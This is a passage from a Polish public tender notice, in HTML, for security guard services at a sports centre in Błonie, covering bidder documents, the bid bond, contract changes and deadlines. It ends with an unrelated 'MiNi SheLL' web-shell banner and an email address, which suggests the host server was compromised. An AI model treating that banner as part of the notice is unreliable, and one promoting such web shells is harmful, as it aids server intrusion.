powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. <br/>Zastępczy dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem. <br/>Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składają wymagane przez Zamawiającego dokumenty zgodnie z rozporządzeniem Ministra Rozwoju, Pracy <br/>i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. 2020.2415)<br/>b) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę/ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/><br/>c) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego w pkt 22 SWZ, o którym mowa w § 2 ust. 1 pkt 7 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. 2020.2415)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie potwierdzający wykonanie - co najmniej 3 zamówień o wartości nie mniejszej niż 150 000 zł brutto każde, polegające na świadczeniu usług ochrony osób i mienia wraz z monitoringiem obiektów ze stałym patrolem interwencyjnym, wraz z podaniem, przedmiotu, wartości, dat wykonania (okresu realizacji) i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy usługi zostały wykonane lub są wykonywane należycie.<br/> <br/>Dowodami w przypadku zamówień na usługi są: <br/>– referencje, <br/>– inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów to oświadczenie Wykonawcy,<br/><br/>Uwaga! W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/><br/>*Za wykonaną usługę Zamawiający uzna taką usługę której przedmiot został odebrany przez Zamawiającego jako wykonany należycie.<br/>* W przypadku, gdy Wykonawca wykaże się usługą, która jest w toku realizacji tzn. jest wykonywana, Zamawiający uzna warunek za spełniony, jeżeli na dzień składania ofert w postępowaniu okres świadczenia usługi będzie nie krótszy niż 3 miesiące.<br/><br/>b) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie pracami, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami:<br/><br/>zawierający co najmniej :<br/><br/>- min. 1 koordynatora usług ochroniarskich z min. 5 letnim doświadczeniem, posiadającego wpis na „listę kwalifikowanych pracowników ochrony fizycznej” w rozumieniu ustawy o ochronie fizycznej osób i mienia, spełniający wymogi zgodnie z art. 25, 26 i 27 (t. j. Dz. U. z 2018 r., poz. 2142), pełniący nadzór nad agentami ochrony fizycznej,<br/> <br/> - min. 3 kwalifikowanych pracowników ochrony z min. 3 letnim doświadczeniem, którzy będą pełnić ochronę na terenie Centrum Sportu w Błoniu, wpisanych na „listę kwalifikowanych pracowników ochrony fizycznej” prowadzoną zgodnie z ustawą o ochronie osób i mienia.<br/><br/>c) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzająca wysokość <br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy w kwocie min. 100.000,00 zł, <br/>wystawionej nie wcześniej niż 3 miesiące przed jej złożeniem,<br/><br/> * W przypadku, gdy Wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału w <br/> postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 ustawy Pzp, na zasoby innych podmiotów należy <br/> złożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającą<br/> wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu w kwocie min. <br/> 100.000,00 zł, wystawioną nie wcześniej niż 3 miesiące przed jej złożeniem <br/><br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego powyższych dokumentów, o których mowa powyżej w pkt 12.7 lit. d) SWZ, wykonawca składa inne dokumenty, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu, dotyczącego sytuacji ekonomicznej lub finansowej.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) *Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego do złożenia oferty musi być złożone w oryginale w takiej samej formie jak składana oferta (tj. w formie elektronicznej lub w postaci elektronicznej, opatrzonej podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego1991 r. – prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. (*jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 2 do oferty.<br/><br/>b) Dowód wpłacenia wadium: ( 5.000,- zł )<br/>Wadium może być wnoszone wg wyboru Wykonawcy w jednej lub kilku formach zgodnie z art. 97 ust. 7 pkt 1-4 ustawy Pzp. <br/>W przypadku wnoszenia wadium w innej formie niż pieniężna dowód wpłacenia wadium należy złożyć w oryginale w postaci elektronicznej.<br/>Dokument ten będzie załącznikiem Nr 3 do oferty. <br/><br/>c) *Zobowiązanie podmiotów, na których zdolnościach technicznych, zawodowych, sytuacji finansowej lub <br/>ekonomicznej polega Wykonawca do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji <br/>zamówienia podpisane: kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym podmiotu udostępniającego zasoby. ( *jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 4 do oferty. <br/><br/>d) *Oświadczenie, z którego wynika które usługi wykonają poszczególni Wykonawcy składający ofertę wspólnie, podpisane kwalifikowanym podpisem elektronicznym , podpisem zaufanym lub podpisem osobistym ( *jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 5 do oferty. <br/><br/>e) * kopia rekomendacji organizacji skupiającej pracodawców branży ochrony ( np. PolskiegoZwiązku Pracodawców Ochrony, Polskiej Izby Ochrony ) <br/>( *o ile Wykonawca posiada ) Dokument ten będzie załącznikiem Nr 6 do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający ustala wadium w wysokości: 5.000,- zł ( słownie: pięć tysięcy złotych )<br/><br/>Wadium należy wnieść w jednej z form podanych w art. 97 ust. 7 ustawy Pzp. <br/><br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/><br/>Wadium wnoszone w pieniądzu Wykonawca wpłaca na rachunek Zamawiającego w banku:<br/> <br/>PKO BP S.A.; Nr konta: 96 1020 1055 0000 9302 0383 9388<br/><br/>z adnotacją: ”Wadium ZP.03.2021”<br/><br/>Za termin wniesienia wadium w formie pieniężnej ( przelewem ) zostanie przyjęty termin uznania rachunku Zamawiającego.<br/><br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa a art. 97 ust 1 pkt 2 – 4 ustawy Pzp Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/><br/>Postanowienia pkt 11 SWZ odnośnie wadium są dla Wykonawców wiążące.<br/><br/>Zwrotu wpłaconego wadium wykonawcom Zamawiający dokona w trybie art. 98 ust.1 i 2 ustawy Pzp. <br/><br/>Oferta wykonawcy, który nie wniesie lub wniesie wadium w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie odrzucona na podstawie art. 226 ust.1 pkt 14 ustawy Pzp.<br/><br/>Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2–4, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej ( art. 98 ust. 6 pkt 1 ustawy Pzp)<br/>Zamawiający zatrzymuje również wadium wraz z odsetkami na podstawie art. 98 ust. 6 pkt 2 i 3 ustawy Pzp; tj. jeżeli wykonawca, którego oferta została wybrana:<br/>1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;<br/>2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br/><br/>Jeżeli wadium jest wniesione w jednej z form określonych w art. 97 ust. 7 ustawy Pzp, oprócz pieniężnej to wykonawca winien uwzględnić w nim wszystkie zapisy z ustawy Pzp dotyczące zatrzymania wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 58 ust. 1 ustawy Pzp.<br/>Wykonawcy występujący wspólnie zobowiązani są dołączyć do oferty dokument (pismo, oświadczenie)<br/>wskazujący ustanowionego pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie<br/>zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Dokument ten musi być wystawiony zgodnie z wymogami ustawowymi, podpisany przez prawnie<br/>upoważnionych przedstawicieli wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>2. Zgodnie z art. 445 ust.1 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania <br/>umowy.<br/><br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może<br/>podlegać wykluczeniu z powodu niespełniania warunków, o których mowa w pkt. 10.1a SWZ.<br/><br/>4. Jeśli wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia to:<br/><br/>a) warunek określony w pkt 10.1.4) lit. a. musi spełniać przynajmniej jeden z Wykonawców (Partnerów)<br/>składających ofertę wspólną, <br/>b) pozostałe warunki określone powyżej musi spełniać co najmniej jeden z Partnerów składających ofertę <br/>wspólną lub Partnerzy składający ofertę wspólną spełniają łącznie.<br/><br/>5. W wypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do których realizacji te zdolności są wymagane. W takim wypadku należy złożyć Zamawiającemu oświadczenie do oferty, z którego wynika które roboty budowlane lub usługi wykonają poszczególni Wykonawcy składający ofertę wspólnie. <br/><br/>6. W przypadku wykonawców wspólnie realizujących zamówienie (w tym konsorcjum) Zamawiający dokonywać będzie bezpośrednich rozliczeń tylko z liderem konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej <br/>umowy odnośnie wydłużenia terminu realizacji z pkt. 5.1 SWZ:<br/><br/>1. Z uwagi na masowe występowanie choroby zakaźnej ludzi (w szczególności koronawirus/COVID-19, etc.) mające bezpośredni lub pośredni wpływ na terminową realizację niniejszego zadania.<br/>2. Z powodu działania siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki <br/>zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub <br/>zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.<br/>3. Z przyczyn zależnych i niezależnych od Zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy.<br/>4. Spowodowaną względami formalnymi, związanymi z przedłużającą się procedurą wyboru Wykonawcy <br/>(ponad 30 dniowy termin związania ofertą). Termin realizacji umowy ulegnie wtedy przedłużeniu max. <br/>o okres wydłużonego ponad 30 dniowego terminu związania z ofertą.<br/><br/>Zamawiający dopuszcza zmiany postanowień zawartej umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, o ile zachodzą okoliczności wymienione w art. 455 ust.1 i 2 ustawy Pzp.<br/>Zamawiający informuje, że wynagrodzenie Wykonawcy ulegnie zmianie ( na wniosek wykonawcy ), w przypadku zmiany:<br/><br/>- stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>- wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>- zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>- zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie <br/>z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz.1074 i 1572) , <br/>jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.<br/>Zmiana o której mowa powyżej następuje na wniosek Wykonawcy. We wniosku, o którym mowa w zdaniu poprzednim Wykonawca ma obowiązek szczegółowo uzasadnić wpływ zmiany na koszty wykonania zamówienia przez Wykonawcę. Zamawiający ma prawo do weryfikacji zasadności wniosku. Wniosek musi być złożony w terminie 30 dni od wejścia w życie przepisów powodujących zmianę. Wynagrodzenie będzie podlegało zmianie od miesiąca, w którym weszły w życie przepisy dokonujące te zmiany.<br/>Wprowadza się do umowy zasady dokonywania zmian wysokości wynagrodzenia należnego Wykonawcy, zgodnie z art. 439 ustawy Pzp:<br/>1) zmiana wynagrodzenia zostanie określona w oparciu o miesięczny „Wskaźnik cen usług” publikowany w Komunikacie Prezesa Głównego Urzędu Statystycznego w sprawie wskaźnika cen usług określający zmianę ceny usług w porównaniu z analogicznym miesiącem roku poprzedniego, podanego dla pierwszego miesiąca kalendarzowego przypadającego po upływie 12 m-cy od daty zawarcia Umowy;<br/>2) wartość publikowanego wskaźnika przekraczająca 7,0% uprawnia Strony umowy do żądania zmiany wynagrodzenia, przy czym początkowy termin ustalenia zmiany wynagrodzenia przypada po upływie 12 m-cy od daty zawarcia Umowy; <br/>3) zmiana wysokości wynagrodzenia dotyczy tylko tej części wynagrodzenia, która przysługuje Wykonawcy za wykonanie tej części Przedmiotu umowy, której odbiór przypadł po upływie roku od daty zawarcia Umowy;<br/>4) maksymalną wartość zmiany wynagrodzenia, jaką dopuszcza zamawiający w efekcie zastosowania postanowień o zasadach wprowadzania zmian wysokości wynagrodzenia wynosi 10%.<br/>Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z powyższymi zapisami zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy (jeżeli są spełnione warunki o których mowa w art. 439 ust. 5 Pzp), z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-02 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-31</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> A) Cena – waga kryterium – 60 %<br/>B) Kryterium jakościowe usług – 40%<br/><br/>- za posiadanie rekomendacji organizacji skupiającej pracodawców branży ochrony <br/>( np. Polskiego Związku Pracodawców Ochrony, Polskiej Izby Ochrony ) lub równoważnej –

Creat By MiNi SheLL
Email: jattceo@gmail.com